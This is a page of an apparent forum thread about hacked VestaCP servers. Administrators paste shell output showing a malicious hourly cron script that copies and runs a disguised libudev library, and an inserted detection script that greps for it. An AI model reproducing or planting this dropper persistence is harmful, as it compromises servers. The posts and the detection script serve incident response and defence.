Page 3 of 55

Re: Got 10 VestaCP servers exploited

Posted: Sat Apr 07, 2018 6:36 pm
by lukapaunovic
As I said, I took a backup before the breach and reinstalled all servers.

Re: Got 10 VestaCP servers exploited

Posted: Sat Apr 07, 2018 6:39 pm
by usr999
ls -tl /usr/bin | less
for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
cp /lib/libudev.so /lib/libudev.so.6
/lib/libudev.so.6
[root@waterleafshop public_html]# ll /etc/init.d/
total 48
-rw-r--r-- 1 root root 17500 May 3 2017 functions
-rwxr-xr-x 1 root root 4334 May 3 2017 netconsole
-rwxr-xr-x 1 root root 7293 May 3 2017 network
-rw-r--r-- 1 root root 1160 Mar 7 07:27 README
-rwxr-xr-x 1 root admin 295 Apr 5 10:50 update
-rwxr-xr-x 1 root root 2074 Jan 10 06:25 vesta
[root@waterleafshop public_html]# clamscan -r -i /usr
-bash: clamscan: command not found
[root@waterleafshop public_html]# ll /etc/cron.hourly/
total 12
-rwxr-xr-x 1 root root 392 Aug 3 2017 0anacron
-rwxr-x--- 1 root root 172 Jan 8 08:27 awstats
-rwxr-xr-x 1 root admin 228 Apr 5 10:50 gcc.sh
[root@waterleafshop public_html]# cat /etc/cron.hourly/gcc.sh
#!/bin/sh
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin
for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
cp /lib/libudev.so /lib/libudev.so.6
/lib/libudev.so.6
[root@waterleafshop public_html]# cat /etc/cron.hourly/0anacron
#!/bin/sh
# Check whether 0anacron was run today already
if test -r /var/spool/anacron/cron.daily; then
day=`cat /var/spool/anacron/cron.daily`
fi
if [ `date +%Y%m%d` = "$day" ]; then
exit 0;
fi

# Do not run jobs when on battery power
if test -x /usr/bin/on_ac_power; then
/usr/bin/on_ac_power >/dev/null 2>&1
if test $? -eq 1; then
exit 0
fi
fi
/usr/sbin/anacron -s
[root@waterleafshop public_html]# ls -tl /usr/bin | less
-rwxr-xr-x 1 root root 48451 Jun 9 2014 zipdetails
-rwxr-xr-x. 1 root root 19568 Jun 9 2014 last
-rwxr-xr-x. 1 root root 11240 Jun 9 2014 mesg
-r-xr-sr-x. 1 root tty 15344 Jun 9 2014 wall
-rwxr-xr-x 1 root root 167272 Jun 9 2014 aspell
-rwxr-xr-x 1 root root 11320 Jun 9 2014 prezip-bin
-rwxr-xr-x 1 root root 11296 Jun 9 2014 word-list-compress
-rwxr-xr-x 1 root root 988 Jun 9 2014 ispell
-rwxr-xr-x 1 root root 122 Jun 9 2014 spell
-rwxr-xr-x 1 root root 5656 Jun 9 2014 precat
-rwxr-xr-x 1 root root 5656 Jun 9 2014 preunzip
-rwxr-xr-x 1 root root 5656 Jun 9 2014 prezip
-rwxr-xr-x 1 root root 85 Jun 9 2014 run-with-aspell
-rwxr-xr-x. 1 root root 2086 Jun 9 2014 run-parts
-rwxr-xr-x. 1 root root 19688 Jun 9 2014 pkla-admin-identities
-rwxr-xr-x. 1 root root 27960 Jun 9 2014 pkla-check-authorization
-rwxr-xr-x. 1 root root 45448 Jun 9 2014 pkg-config
-rwxr-xr-x 1 root root 329664 Jun 9 2014 flex
-rwxr-xr-x. 1 root root 15768 Jun 9 2014 hostname
-rwxr-xr-x. 1 root root 30488 Jun 9 2014 testgdbm
-rwxr-xr-x. 1 root root 37528 Jun 9 2014 catman
-rwxr-xr-x. 1 root root 87024 Jun 9 2014 lexgrog
-rwxr-xr-x. 1 root root 102736 Jun 9 2014 man
-rwxr-xr-x. 1 root root 125088 Jun 9 2014 mandb
-rwxr-xr-x. 1 root root 33224 Jun 9 2014 manpath
-rwxr-xr-x. 1 root root 46456 Jun 9 2014 whatis
-rwxr-xr-x 1 root root 40824 Jun 9 2014 recode
-rwxr-xr-x. 1 root root 147880 Jun 9 2014 eqn
-rwxr-xr-x. 1 root root 83584 Jun 9 2014 groff
-rwxr-xr-x. 1 root root 144232 Jun 9 2014 grops
-rwxr-xr-x. 1 root root 100952 Jun 9 2014 grotty
-rwxr-xr-x. 1 root root 184736 Jun 9 2014 pic
-rwxr-xr-x. 1 root root 192048 Jun 9 2014 post-grohtml
-rwxr-xr-x. 1 root root 41864 Jun 9 2014 preconv
-rwxr-xr-x. 1 root root 88312 Jun 9 2014 pre-grohtml
-rwxr-xr-x. 1 root root 33368 Jun 9 2014 soelim
-rwxr-xr-x. 1 root root 118744 Jun 9 2014 tbl
-rwxr-xr-x. 1 root root 525272 Jun 9 2014 troff
-rwxr-xr-x. 1 root root 3392 Jun 9 2014 nroff
-rwxr-xr-x. 1 root root 271 Jun 9 2014 neqn
-rwxr-xr-x 1 root root 13581 Jun 9 2014 pod2man
-rwxr-xr-x 1 root root 11004 Jun 9 2014 pod2text
-rwxr-xr-x 1 root root 83424 Jun 9 2014 bc
-rwxr-xr-x 1 root root 45392 Jun 9 2014 dc
-rwxr-xr-x 1 root root 3724 Feb 3 2014 ipcount
-rwxr-xr-x 1 root root 982 Feb 3 2014 iptab
-rwxr-xr-x 1 root root 2953 Oct 10 2008 zipgrep
cat /etc/cron.hourly/gcc.sh
#!/bin/sh
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin
for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
cp /lib/libudev.so /lib/libudev.so.6
/lib/libudev.so.6
# cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root

# For details see man 4 crontabs

# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed

Re: Got 10 VestaCP servers exploited

Posted: Sat Apr 07, 2018 6:42 pm
by StudioMaX

# cat /opt/backup/etc/cron.hourly/gcc.sh
#!/bin/sh
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin
for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
cp /lib/libudev.so /lib/libudev.so.6
/lib/libudev.so.6

# cat /opt/backup/etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root

# For details see man 4 crontabs

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name  command to be executed

# ls -tl /opt/backup/usr/bin | less
total 245832
lrwxrwxrwx   1 root root         38 Mar 30 15:17 npm -> ../lib/node_modules/npm/bin/npm-cli.js
lrwxrwxrwx   1 root root         38 Mar 30 15:17 npx -> ../lib/node_modules/npm/bin/npx-cli.js
lrwxrwxrwx   1 root root          9 Mar 30 15:16 phar -> phar.phar
-rwxr-xr-x   1 root root   33983272 Mar 30 07:10 node
-rwxr-xr-x   1 root root     204552 Mar 29 12:02 memcached
-rwxr-xr-x   1 root root       6110 Mar 29 02:06 memcached-tool
-rwxr-xr-x   1 root root    4935304 Mar 28 14:27 php
-rwxr-xr-x   1 root root    4828904 Mar 28 14:27 php-cgi
-rwxr-xr-x   1 root root    5120416 Mar 28 14:27 zts-php
-rwxr-xr-x   1 root root      14823 Mar 28 14:27 phar.phar
-rwxr-xr-x   1 root root       5475 Mar 28 14:27 php-config
-rwxr-xr-x   1 root root       4776 Mar 28 14:27 phpize
-rwxr-xr-x   1 root root       5659 Mar 28 14:26 zts-php-config
-rwxr-xr-x   1 root root       4788 Mar 28 14:26 zts-phpize
lrwxrwxrwx   1 root root         42 Mar 25 20:04 uglifyjs -> ../lib/node_modules/uglify-js/bin/uglifyjs
lrwxrwxrwx   1 root root         39 Mar 25 17:24 uglifycss -> ../lib/node_modules/uglifycss/uglifycss
lrwxrwxrwx   1 root root         11 Mar 25 17:07 audit2why -> audit2allow
lrwxrwxrwx   1 root root          3 Mar 25 15:46 twopi -> dot
lrwxrwxrwx   1 root root          3 Mar 25 15:46 sfdp -> dot
lrwxrwxrwx   1 root root          3 Mar 25 15:46 osage -> dot
lrwxrwxrwx   1 root root          3 Mar 25 15:46 patchwork -> dot
lrwxrwxrwx   1 root root          3 Mar 25 15:46 neato -> dot
lrwxrwxrwx   1 root root          6 Mar 25 15:46 gxl2dot -> gxl2gv
lrwxrwxrwx   1 root root          6 Mar 25 15:46 gv2gxl -> gxl2gv
lrwxrwxrwx   1 root root          6 Mar 25 15:46 dot2gxl -> gxl2gv
lrwxrwxrwx   1 root root          3 Mar 25 15:46 fdp -> dot
lrwxrwxrwx   1 root root          3 Mar 25 15:46 circo -> dot
lrwxrwxrwx   1 root root         21 Mar 25 14:02 jjs -> /etc/alternatives/jjs
lrwxrwxrwx   1 root root         25 Mar 25 14:02 keytool -> /etc/alternatives/keytool
lrwxrwxrwx   1 root root         22 Mar 25 14:02 orbd -> /etc/alternatives/orbd
lrwxrwxrwx   1 root root         25 Mar 25 14:02 pack200 -> /etc/alternatives/pack200
lrwxrwxrwx   1 root root         28 Mar 25 14:02 policytool -> /etc/alternatives/policytool
lrwxrwxrwx   1 root root         22 Mar 25 14:02 rmid -> /etc/alternatives/rmid
lrwxrwxrwx   1 root root         29 Mar 25 14:02 rmiregistry -> /etc/alternatives/rmiregistry
lrwxrwxrwx   1 root root         28 Mar 25 14:02 servertool -> /etc/alternatives/servertool
lrwxrwxrwx   1 root root         27 Mar 25 14:02 tnameserv -> /etc/alternatives/tnameserv
lrwxrwxrwx   1 root root         27 Mar 25 14:02 unpack200 -> /etc/alternatives/unpack200
lrwxrwxrwx   1 root root         22 Mar 25 14:02 java -> /etc/alternatives/java
lrwxrwxrwx   1 root root          4 Mar 23 20:56 lex -> flex
lrwxrwxrwx   1 root root          4 Mar 23 20:56 flex++ -> flex
lrwxrwxrwx   1 root root          3 Mar 23 20:56 pftp -> ftp
lrwxrwxrwx   1 root root         15 Mar 23 20:56 nail -> ../../bin/mailx
lrwxrwxrwx   1 root root         15 Mar 23 20:56 Mail -> ../../bin/mailx
lrwxrwxrwx   1 root root          5 Mar 23 20:56 mail -> mailx
lrwxrwxrwx   1 root root          7 Mar 23 20:56 dsync -> doveadm
lrwxrwxrwx   1 root root          9 Mar 23 20:56 webazolver -> webalizer
lrwxrwxrwx   1 root root          9 Mar 23 20:56 rrdcreate -> rrdupdate
lrwxrwxrwx   1 root root          9 Mar 23 20:56 rrdinfo -> rrdupdate
lrwxrwxrwx   1 root root         23 Mar 23 20:56 whois -> /etc/alternatives/whois
lrwxrwxrwx   1 root root          2 Mar 23 20:55 mcedit -> mc
Also, I've checked all the logs for the last 7 days and found nothing suspicious. Unfortunately, logging is disabled for many internal domains (for example, roundcube).
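The two posts above (usr999's live transcript and StudioMaX's /opt/backup listings) show what the dropper looks like on disk: an hourly cron script that brings every interface up, copies /lib/libudev.so to /lib/libudev.so.6 and executes it, plus an init script named update, both carrying group admin and the same modification time. The following POSIX sh audit is an added example, not code from the thread or from VestaCP: it walks a cron or init directory and reports those indicators. The function names and the constructed sample tree are this example's own; the intended target is a mounted backup such as /opt/backup/etc/cron.hourly, because the transcript shows clamscan itself was missing on the compromised host and binaries there cannot be trusted.

```shell
#!/bin/sh
# Added example (not from the thread or from VestaCP): offline audit of a cron/init
# directory for the gcc.sh-style dropper quoted in the posts above. Indicators are
# taken from the posted artifacts:
#   - a script that copies /lib/libudev.so to /lib/libudev.so.6 and executes it
#   - the `for i in ... /proc/net/dev ... ifconfig $i up` loop
#   - dropped files (gcc.sh, update) owned by group "admin" instead of "root"
# Function names and the sample tree are this example's own.

# audit_cron_dir DIR -> prints "INDICATOR<TAB>FILE" per hit; returns 1 if any hit, 0 if clean
audit_cron_dir() {
    dir=$1
    found=0
    for f in "$dir"/*; do
        [ -f "$f" ] || continue
        if grep -q 'libudev\.so' "$f"; then
            printf 'libudev-dropper\t%s\n' "$f"
            found=1
        fi
        if grep -q 'cat /proc/net/dev' "$f" && grep -q 'ifconfig' "$f"; then
            printf 'iface-up-loop\t%s\n' "$f"
            found=1
        fi
    done
    return $found
}

# count_hits DIR -> number of indicator lines audit_cron_dir prints for DIR
count_hits() {
    audit_cron_dir "$1" | wc -l | tr -d ' '
}

# list_foreign_group DIR -> regular files whose group is not root (root:admin in the listings above)
list_foreign_group() {
    find "$1" -type f ! -group root -print
}

# make_sample_tree -> constructed cron.hourly holding a copy of the posted dropper and a
# benign neighbour; prints its path so the example runs offline
make_sample_tree() {
    tmp=$(mktemp -d)
    mkdir -p "$tmp/cron.hourly"
    cat > "$tmp/cron.hourly/gcc.sh" <<'EOF'
#!/bin/sh
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin
for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
cp /lib/libudev.so /lib/libudev.so.6
/lib/libudev.so.6
EOF
    printf '#!/bin/sh\n/usr/sbin/anacron -s\n' > "$tmp/cron.hourly/0anacron"
    printf '%s\n' "$tmp/cron.hourly"
}

# Usage: sh audit_cron.sh [DIR]; with no DIR the constructed sample tree is audited.
target=${1:-}
if [ -z "$target" ]; then
    target=$(make_sample_tree)
fi
if audit_cron_dir "$target"; then
    echo "no indicators in $target"
else
    echo "indicators found in $target; compare against ls -tl and check /lib/libudev.so* on the backup"
fi
# The group check is only meaningful on a real backup; on the sample tree it would
# just report whoever ran this script.
if [ -n "${1:-}" ]; then
    list_foreign_group "$target"
fi
```

Run it once per directory that appeared in the listings (cron.hourly, init.d, and the crontab files) on the backup copy; a clean directory prints nothing from audit_cron_dir and returns 0. The content checks are deliberately literal so they stay tied to what was actually posted; a renamed dropper that drops a different library would need its own indicator.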

Re: Got 10 VestaCP servers exploited

Posted: Sat Apr 07, 2018 6:57 pm
by dpeca

Re: Got 10 VestaCP servers exploited

Posted: Sat Apr 07, 2018 7:01 pm
by lukapaunovic
Those posts do explain the virus and its removal, but even after removal it will eventually reappear, because we are still not aware of a vuln which is obviously present somewhere within the system.

Re: Got 10 VestaCP servers exploited

Posted: Sat Apr 07, 2018 7:06 pm
by Kana
Hello,

Same thing here. Fresh install of Ubuntu 16 a week ago. Installed the latest version of VestaCP and a WordPress right after (no plugins), then on 7 April the server was blocked by OVH for a DDoS attack. Same IP as you guys, in China.

My vesta install: Nginx + php-fpm, vsftpd, exim, iptables + fail2ban, MySQL DB, and that's all.

Hope there will be a fix soon.

All my other servers running the previous version of VestaCP don't seem to be impacted yet.

Re: Got 10 VestaCP servers exploited

Posted: Sat Apr 07, 2018 7:10 pm
by StudioMaX
lukapaunovic wrote:
Sat Apr 07, 2018 7:01 pm
Those posts do explain the virus and its removal. but even after removal it will eventually reappear again because we are still not aware of a vuln which is obviously present somewhere within the system.
Once again, I am copying the answer from my hoster, which I posted in another topic:
At the same time, however, by all appearances the compromise was somehow connected with vesta and roundcube, because at the same time as yours, problems with similar symptoms arose on several other servers belonging to our clients. Vesta was also installed on those servers, and the malicious processes had the roundcube directory as their current working directory, while the Linux distributions differed.
I checked, and I had the latest version of Roundcube, 1.3.5. Unfortunately, the hoster did not provide access to an infected server to view the other running processes.

Re: Got 10 VestaCP servers exploited

Posted: Sat Apr 07, 2018 7:17 pm
by lukapaunovic
StudioMaX, I was referring to dpeca's links.

Re: Got 10 VestaCP servers exploited

Posted: Sat Apr 07, 2018 7:38 pm
by lukapaunovic
Users are increasingly coming back to me reporting their servers are hacked :(

Re: Got 10 VestaCP servers exploited

Posted: Sat Apr 07, 2018 7:49 pm
by lukapaunovic
I think I can handle this.
There are MANY people, MANY servers.
This is CRAZY.
OVH is stubborn and is letting me back up some servers, some not.

I'm gonna die.